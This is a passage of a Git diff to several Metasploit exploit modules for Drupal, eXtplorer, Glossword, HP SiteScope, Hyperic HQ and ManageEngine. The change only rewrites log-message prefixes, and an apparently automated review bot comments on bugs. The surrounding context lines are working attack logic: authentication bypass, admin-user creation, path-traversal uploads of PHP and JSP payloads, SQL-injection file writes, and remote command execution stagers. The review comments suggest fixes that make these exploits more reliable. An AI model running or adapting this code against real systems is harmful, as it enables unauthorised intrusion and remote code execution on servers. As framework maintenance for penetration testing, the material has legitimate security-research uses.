upload file") return end end 
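Review bot: In the `@@ -107,19 @@` hunk of dexter_casinoloader_exec.rb, the `if password == false` branch logs an error but has no `return`, unlike the username branch just above it. Execution therefore continues to `print_status("Using #{user}:#{password}")`, which prints `false` as the password, and then sends the login request. Add `return` after `print_error("Failed to acquire administrator password")` so both lookups fail the same way. The body of `exploit` continues past the end of this hunk.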
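Review bot: In the `@@ -159,11 @@` hunk, `path = path.sub! "\\", "/"` assigns `nil` whenever the captured path contains no backslash, because `sub!` returns `nil` when nothing was replaced. That `nil` is then passed to `normalize_uri(target_uri.path, path)` and ends up in the "Requesting:" message. Use the non-destructive form, `path = path.sub("\\", "/")`, or `gsub` if more than one separator can occur. The regex that sets `$1` is outside the hunk, so the possible shapes of `path` should be checked there.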
diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb index d7fe87b82c..ac0adec7c5 100644 --- a/modules/exploits/multi/http/drupal_drupageddon.rb +++ b/modules/exploits/multi/http/drupal_drupageddon.rb @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote md5_base64 = phpass_encode64(md5, md5.length) md5_stripped = md5_base64[0...22] pass = "$P\\$" + iter_char + salt + md5_stripped - vprint_status("#{peer} - password hash: #{pass}") + vprint_status("password hash: #{pass}") return pass end @@ -129,8 +129,8 @@ class Metasploit3 < Msf::Exploit::Remote form_build_id = $1 if content =~ /name="form_build_id" value="(.+?)"/ form_token = $1 if content =~ /name="form_token" value="(.+?)"/ - vprint_status("#{peer} - form_build_id: #{form_build_id}") - vprint_status("#{peer} - form_token: #{form_token}") + vprint_status("form_build_id: #{form_build_id}") + vprint_status("form_token: #{form_token}") return form_build_id, form_token end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote # TODO: Check if option admin_role exists via admin/people/permissions/roles # call login page to extract tokens - print_status("#{peer} - Testing page") + print_status("Testing page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote 'op' => 'Log in' } - print_status("#{peer} - Creating new user #{user}:#{pass}") + print_status("Creating new user #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote end # login - print_status("#{peer} - Logging in as #{user}:#{pass}") + print_status("Logging in as #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', 
@@ -202,10 +202,10 @@ class Metasploit3 < Msf::Exploit::Remote end cookie = res.get_cookies - vprint_status("#{peer} - cookie: #{cookie}") + vprint_status("cookie: #{cookie}") # call admin interface to extract CSRF token and enabled modules - print_status("#{peer} - Trying to parse enabled modules") + print_status("Trying to parse enabled modules") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end # enable PHP filter - print_status("#{peer} - Enabling the PHP filter module") + print_status("Enabling the PHP filter module") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Response: http 302, Location: http://10.211.55.50/?q=admin/modules - print_status("#{peer} - Setting permissions for PHP filter module") + print_status("Setting permissions for PHP filter module") # allow admin to use php_code res = send_request_cgi({ @@ -280,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote # get administrator role id id = $1 if res.body =~ /for="edit-([0-9]+)-administer-content-types">#{admin_role}:/ - vprint_status("#{peer} - admin role id: #{id}") + vprint_status("admin role id: #{id}") unless id fail_with(Failure::Unknown, "Could not parse out administrator ID") @@ -313,7 +313,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Add new Content page (extract csrf token) - print_status("#{peer} - Getting tokens from create new article page") + print_status("Getting tokens from create new article page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -342,7 +342,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('1', nil, nil, 'form-data; name="promote"') post_data = data.to_s - print_status("#{peer} - Calling preview page. Exploit should trigger...") + print_status("Calling preview page. Exploit should trigger...") send_request_cgi( 'method' => 'POST', 'uri' => uri_path, 
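Review bot: In the `@@ -280,7 @@` hunk of drupal_drupageddon.rb, `admin_role` is interpolated into the regex `/for="edit-([0-9]+)-administer-content-types">#{admin_role}:/` without escaping. A role name containing regex metacharacters would change or break the match. Where `admin_role` comes from is not visible here, but `#{Regexp.escape(admin_role)}` is safe either way. The `vprint_status("admin role id: #{id}")` line also runs before the `unless id` guard, so on failure it prints an empty id just before `fail_with`; moving it below the guard keeps the verbose output meaningful.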
diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index 0f1d3770c3..eda04d55c3 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_payload - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ 'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")), @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body.empty? if is_payload - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end register_files_for_cleanup(target_path.gsub("../../", "../")) return true @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Determining target") + print_status("Determining target") version = get_version @@ -308,7 +308,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") + print_status("Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") sleep(datastore['SLEEP']) return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4))) end @@ -322,10 +322,10 @@ class Metasploit3 < Msf::Exploit::Remote @my_target = pick_target if @my_target.nil? - print_error("#{peer} - Unable to select a target, we must bail.") + print_error("Unable to select a target, we must bail.") return else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end if @my_target == targets[1] 
@@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote exploit_path = exploit_native end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(exploit_path), 'method' => 'GET' diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 1289010cbd..542509bd28 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -141,16 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";" # bypass auth - print_status("#{peer} - Authenticating as user (#{user})") + print_status("Authenticating as user (#{user})") res = auth_bypass(base, user) if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # search for writable directories - print_status("#{peer} - Retrieving writable subdirectories") + print_status("Retrieving writable subdirectories") begin res = send_request_cgi({ 'method' => 'POST', 
@@ -163,19 +163,19 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ dir = "#{base}#{$1}" - print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})") + print_status("Successfully retrieved writable subdirectory (#{$1})") else dir = "#{base}" - print_error("#{peer} - Could not find a writable subdirectory.") + print_error("Could not find a writable subdirectory.") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, dir, @fname, php) if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote end # search directories in the web root for the file - print_status("#{peer} - Searching directories for file (#{@fname})") + print_status("Searching directories for file (#{@fname})") begin res = send_request_cgi({ 'method' => 'POST', @@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ dir = $1.gsub('\\','') - print_good("#{peer} - Successfully found file") + print_good("Successfully found file") else - print_error("#{peer} - Failed to find file") + print_error("Failed to find file") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (/#{dir}/#{@fname})") + print_status("Executing payload (/#{dir}/#{@fname})") begin send_request_cgi({ 'method' => 'GET', 
@@ -213,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Connection failed") end if res and res.code != 200 - print_error("#{peer} - Executing payload failed") + print_error("Executing payload failed") end end end diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 0aa285ac06..a829e464cc 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -54,21 +54,21 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = login(base, user, pass) if res if res.code == 200 - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Unknown elsif res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ - vprint_good("#{peer} - Authenticated successfully") + vprint_good("Authenticated successfully") return Exploit::CheckCode::Appears end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Safe 
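Review bot: In the `@@ -213,7 @@` hunk of extplorer_upload_exec.rb, the closing check `if res and res.code != 200` appears to test a stale response. The request that runs the payload is opened in the preceding hunk as a bare `send_request_cgi({` with no assignment, so `res` would still hold the reply to the earlier directory search. Changing that line to `res = send_request_cgi({` makes "Executing payload failed" reflect the request it describes. The lines between the two hunks are not shown, so confirm nothing reassigns `res` there.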
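Review bot: In the `@@ -54,21 @@` hunk of glossword_upload_exec.rb, the `rescue` branch of `check` prints "Connection failed" and then falls through to `return Exploit::CheckCode::Safe`. An unreachable host is therefore reported as not vulnerable, and a `nil` response takes the same path. The extplorer module in this same commit returns `Exploit::CheckCode::Unknown` from the equivalent rescue. Add `return Exploit::CheckCode::Unknown` after `vprint_error("Connection failed")` to match it. The start of `check` is outside the hunk.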
@@ -128,23 +128,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login; get session id and token - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = login(base, user, pass) if res and res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ token = "#{$1}" sid = "#{$2}" - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, sid, @fname, php) if res and res.code == 301 and res['location'] =~ /Setting saved/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve PHP file path - print_status("#{peer} - Locating PHP payload file") + print_status("Locating PHP payload file") begin res = send_request_cgi({ 'method' => 'GET', @@ -166,13 +166,13 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/ shell_uri = "#{$1}" @fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)') - print_good("#{peer} - Found payload file path (#{shell_uri})") + print_good("Found payload file path (#{shell_uri})") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{shell_uri})") + print_status("Executing payload (#{shell_uri})") begin send_request_cgi({ 'method' => 'GET', 
diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb index f8e6b61147..e27433b5a2 100644 --- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -93,11 +93,11 @@ class Metasploit3 < Msf::Exploit::Remote def exploit if target.name =~ /Windows/ - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # cmd.exe max length is 8192 execute_cmdstager({:linemax => 8000, :nodelete => true}) elsif target.name =~ /Linux/ - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_command(payload.encoded, {:http_timeout => 1}) end end diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 7c5029cbf6..aa418720b9 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -88,15 +88,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' # Create user with empty credentials - print_status("#{peer} - Creating user with empty credentials") + print_status("Creating user with empty credentials") if create_user.nil? - print_error("#{peer} - Failed to create user") + print_error("Failed to create user") return end # Generate an initial JSESSIONID - print_status("#{peer} - Retrieving an initial JSESSIONID") + print_status("Retrieving an initial JSESSIONID") res = send_request_cgi( 'uri' => normalize_uri(@uri, 'servlet/Main'), 'method' => 'POST' 
@@ -105,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 else - print_error("#{peer} - Retrieve of initial JSESSIONID failed") + print_error("Retrieve of initial JSESSIONID failed") return end # Authenticate login_data = "j_username=&j_password=" - print_status("#{peer} - Authenticating on HP SiteScope Configuration") + print_status("Authenticating on HP SiteScope Configuration") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'j_security_check'), @@ -129,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote session_id = $1 redirect = URI(res.headers['Location']).path else - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end # Follow redirection to complete authentication process - print_status("#{peer} - Following redirection to finish authentication") + print_status("Following redirection to finish authentication") res = send_request_cgi( { 'uri' => redirect, @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote traversal = "..\\..\\..\\..\\..\\..\\" end - print_status("#{peer} - Uploading the payload") + print_status("Uploading the payload") res = send_request_cgi( { 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true", 
@@ -249,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - Payload successfully uploaded to #{path}") + print_good("Payload successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the Payload") + print_error("Error uploading the Payload") return end post_data = Rex::MIME::Message.new post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"") - print_status("#{peer} - Uploading the JSP") + print_status("Uploading the JSP") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", @@ -273,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - JSP successfully uploaded to #{path}") + print_good("JSP successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the JSP") + print_error("Error uploading the JSP") return end diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 9503af4d02..25f76c5668 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -81,12 +81,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_command(cmd) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.code == 200 && res.body =~ /#{sig}/ - vprint_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'") + vprint_good("Running with user '#{res.body.split(sig)[1].strip}'") return Exploit::CheckCode::Vulnerable end 
@@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote if @cookie.empty? fail_with(Failure::NoAccess, "#{peer} - Login failed") else - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") + print_good("Logged in as '#{datastore['USERNAME']}'") end end diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 6deb124231..329b8ee316 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -94,12 +94,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_warning("#{peer} - Could not access the script console") + print_warning("Could not access the script console") end if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") end end @@ -113,12 +113,12 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - vprint_status("#{peer} - Authenticating as '#{user}'") + vprint_status("Authenticating as '#{user}'") res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - vprint_good("#{peer} - Authenticated successfully as '#{user}'") + vprint_good("Authenticated successfully as '#{user}'") # check access to the console - vprint_status("#{peer} - Checking access to the script console") + vprint_status("Checking access to the script console") get_nonce if @nonce.nil? return Exploit::CheckCode::Detected @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Appears end elsif res.headers.include?('X-Jenkins') or res.headers['location'] =~ /authfailed/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe 
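Review bot: In the `@@ -94,12 @@` hunk of hyperic_hq_script_console.rb, the guard `if not res or res.code != 200` only prints a warning, and the next statement `if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/` still dereferences `res`. A timed-out request therefore raises NoMethodError instead of leaving `@nonce` unset. Either `return` after the warning or write the second test as `if res && res.body =~ ...`. The same pattern is in the `@@ -126,7 @@` hunk, where `elsif res.headers.include?('X-Jenkins') or ...` is reached when the preceding `if res and ...` failed because `res` was `nil`; guard it with `elsif res && (...)`. The `X-Jenkins` header test also looks copied from another module and is worth confirming for this target.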
@@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(client) if not @to_delete.nil? - print_warning("#{peer} - Deleting #{@to_delete} payload file") + print_warning("Deleting #{@to_delete} payload file") execute_command("rm #{@to_delete}") end end @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res and res.code == 200 and res.body =~ /Executed/ - vprint_good("#{peer} - Command executed successfully") + vprint_good("Command executed successfully") else fail_with(Failure::Unknown, "#{peer} - Failed to execute the command.") end # version 4.6.6 returns a new CSRF nonce in the response if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") # version 4.5.2 does not, so we request a new one else get_nonce @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") http_send_command(java_craft_runtime_exec(cmd)) end 
@@ -258,23 +258,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - print_good("#{peer} - Authenticated successfully as '#{user}'") + print_good("Authenticated successfully as '#{user}'") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # check access to the console and get CSRF nonce - print_status("#{peer} - Checking access to the script console") + print_status("Checking access to the script console") get_nonce # check operating system if target.name =~ /Automatic/ - print_status("#{peer} - Trying to detect the remote target...") + print_status("Trying to detect the remote target...") @my_target = get_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to detect the remote target") else - print_good("#{peer} - #{@my_target.name} target found") + print_good("#{@my_target.name} target found") end else @my_target = target @@ -283,10 +283,10 @@ class Metasploit3 < Msf::Exploit::Remote # send payload case @my_target['Platform'] when 'win' - print_status("#{peer} - Sending command stager...") + print_status("Sending command stager...") execute_cmdstager({:linemax => 2049}) when 'unix' - print_status("#{peer} - Sending UNIX payload...") + print_status("Sending UNIX payload...") http_send_command(java_craft_runtime_exec(payload.encoded)) when 'linux' print_status("#{rhost}:#{rport} - Sending Linux stager...") diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index ec577eb1d3..3f550c6497 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb 
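Review bot: In the `@@ -283,10 @@` hunk, the `when 'linux'` branch still builds its own prefix, `print_status("#{rhost}:#{rport} - Sending Linux stager...")`, while the `win` and `unix` branches beside it were stripped. If the print helpers now add the peer themselves, as the rest of this commit assumes, this line will show the address twice. Change it to `print_status("Sending Linux stager...")` so the three branches match. The `case` statement continues past the end of the hunk.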
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -104,12 +104,12 @@ class Metasploit3 < Msf::Exploit::Remote @fname = rand_text_numeric(7) # upload PHP payload to userpictures/[fname].php - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php) if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)") + print_status("Executing payload (userpictures/#{@fname}.php)") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 5360e33007..3e7f142d56 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb 
@@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>| - print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)") + print_status("Sending PHP payload (#{php.length.to_s} bytes)") send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"), 'data' => php }) - print_status("#{peer} - Requesting data.php") + print_status("Requesting data.php") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php') diff --git a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb index 35b1b39b40..71b8f3c04e 100644 --- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb +++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Automatic targeting failed.") else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end # When using auto targeting, MSF selects the Windows meterpreter as the default payload. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote inject_exec(fullpath) register_file_for_cleanup(fullpath.sub('../','')) - print_status("#{peer} - Requesting #{jsp_name}") + print_status("Requesting #{jsp_name}") send_request_raw({'uri' => normalize_uri(jsp_name)}) end @@ -303,7 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Selecting target, this might take a few seconds...") + print_status("Selecting target, this might take a few seconds...") rand_txt = rand_text_alpha_lower(8) << ".txt" paths = db_paths 
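Review bot: In the `@@ -82,14 @@` hunk of log1cms_ajax_create_folder.rb, the context line `peer = "#{rhost}:#{rport}"` is now unused within the hunk, since both messages that interpolated it were rewritten. The local also presumably shadows the framework's own `peer` helper, which other modules in this commit call without defining it. If nothing later in the method still reads it (the method continues outside the hunk), delete the assignment.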
@@ -488,7 +488,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - print_status("#{peer} - Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") + print_status("Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") if @my_target['Database'] == 'postgresql' inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'") @@ -528,12 +528,12 @@ class Metasploit3 < Msf::Exploit::Remote if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 if ver_gt(build, '80200') - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else - print_status("#{peer} - Detected Desktop Central v8 #{build} (MySQL)") + print_status("Detected Desktop Central v8 #{build} (MySQL)") end else - print_status("#{peer} - Detected Desktop Central v8 (MySQL)") + print_status("Detected Desktop Central v8 (MySQL)") end # DC v8 < 80200 uses the MySQL database Exploit::CheckCode::Appears @@ -542,7 +542,7 @@ class Metasploit3 < Msf::Exploit::Remote def check_desktop_central_9(body) if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 - print_status("#{peer} - Detected Desktop Central v9 #{build}") + print_status("Detected Desktop Central v9 #{build}") if ver_lt(build, '90039') return Exploit::CheckCode::Appears else @@ -565,7 +565,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 uses the MySQL database - print_status("#{peer} - Detected Desktop Central v7 (MySQL)") + print_status("Detected Desktop Central v7 (MySQL)") return Exploit::CheckCode::Appears elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ 
@@ -600,17 +600,17 @@ class Metasploit3 < Msf::Exploit::Remote if ver_lt_eq(build, '6500') # if it's a build below 6500, it will only work if we have a JSP compiler - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") + print_status("Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") return Exploit::CheckCode::Detected elsif ver_lt(build, '6800') # PMP v6 < 6800 uses the MySQL database - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (MySQL)") + print_status("Detected Password Manager Pro v6 #{build} (MySQL)") return Exploit::CheckCode::Appears elsif ver_lt(build, '7003') - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") return Exploit::CheckCode::Appears else - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") Exploit::CheckCode::Safe end end diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index ea739f7e8f..7ea5105ad1 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -365,9 +365,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable") end - print_status("#{peer} - Selecting target...") + print_status("Selecting 